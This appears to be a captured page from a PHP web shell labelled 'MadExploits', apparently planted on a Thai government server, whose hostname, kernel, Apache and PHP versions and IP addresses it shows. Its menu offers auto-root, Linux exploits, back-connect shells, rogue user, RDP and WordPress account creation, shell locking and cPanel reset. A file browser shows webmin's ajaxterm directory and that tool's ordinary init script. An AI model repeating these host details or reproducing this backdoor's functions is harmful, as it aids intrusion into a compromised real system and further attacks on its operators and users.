Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
ajaxterm /
ajaxterm /
[ HOME SHELL ]
Name
Size
Permission
Action
README.txt
4.7
KB
-rw-r--r--
ajaxterm.1
1.17
KB
-rw-r--r--
ajaxterm.css
1.71
KB
-rw-r--r--
ajaxterm.html
631
B
-rw-r--r--
ajaxterm.js
8.26
KB
-rw-r--r--
ajaxterm.py
14.45
KB
-rwxr-xr-x
configure
1.37
KB
-rwxr-xr-x
configure.initd.gentoo
467
B
-rw-r--r--
configure.initd.redhat
1.39
KB
-rw-r--r--
configure.makefile
471
B
-rw-r--r--
qweb.py
49.12
KB
-rw-r--r--
sarissa.js
26.72
KB
-rw-r--r--
sarissa_dhtml.js
4.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : configure.initd.redhat
# # ajaxterm Startup script for ajaxterm # # chkconfig: - 99 99 # description: Ajaxterm is a yadda yadda yadda # processname: ajaxterm # pidfile: /var/run/ajaxterm.pid # version: 1.0 Kevin Reichhart - ajaxterminit at lastname dot org # Source function library. . /etc/rc.d/init.d/functions if [ -f /etc/sysconfig/ajaxterm ]; then . /etc/sysconfig/ajaxterm fi ajaxterm=/usr/local/bin/ajaxterm prog=ajaxterm pidfile=${PIDFILE-/var/run/ajaxterm.pid} lockfile=${LOCKFILE-/var/lock/subsys/ajaxterm} port=${PORT-8022} user=${xUSER-nobody} RETVAL=0 start() { echo -n $"Starting $prog: " daemon $ajaxterm --daemon --port=$port --uid=$user $OPTIONS RETVAL=$? echo [ $RETVAL = 0 ] && touch ${lockfile} return $RETVAL } stop() { echo -n $"Stopping $prog: " killproc $ajaxterm RETVAL=$? echo [ $RETVAL = 0 ] && rm -f ${lockfile} ${pidfile} } reload() { echo -n $"Reloading $prog: " killproc $ajaxterm -HUP RETVAL=$? echo } # See how we were called. case "$1" in start) start ;; stop) stop ;; status) status python ajaxterm RETVAL=$? ;; restart) stop start ;; condrestart) if [ -f ${pidfile} ] ; then stop start fi ;; *) echo $"Usage: $prog {start|stop|restart|condrestart}" exit 1 esac exit $RETVAL
Close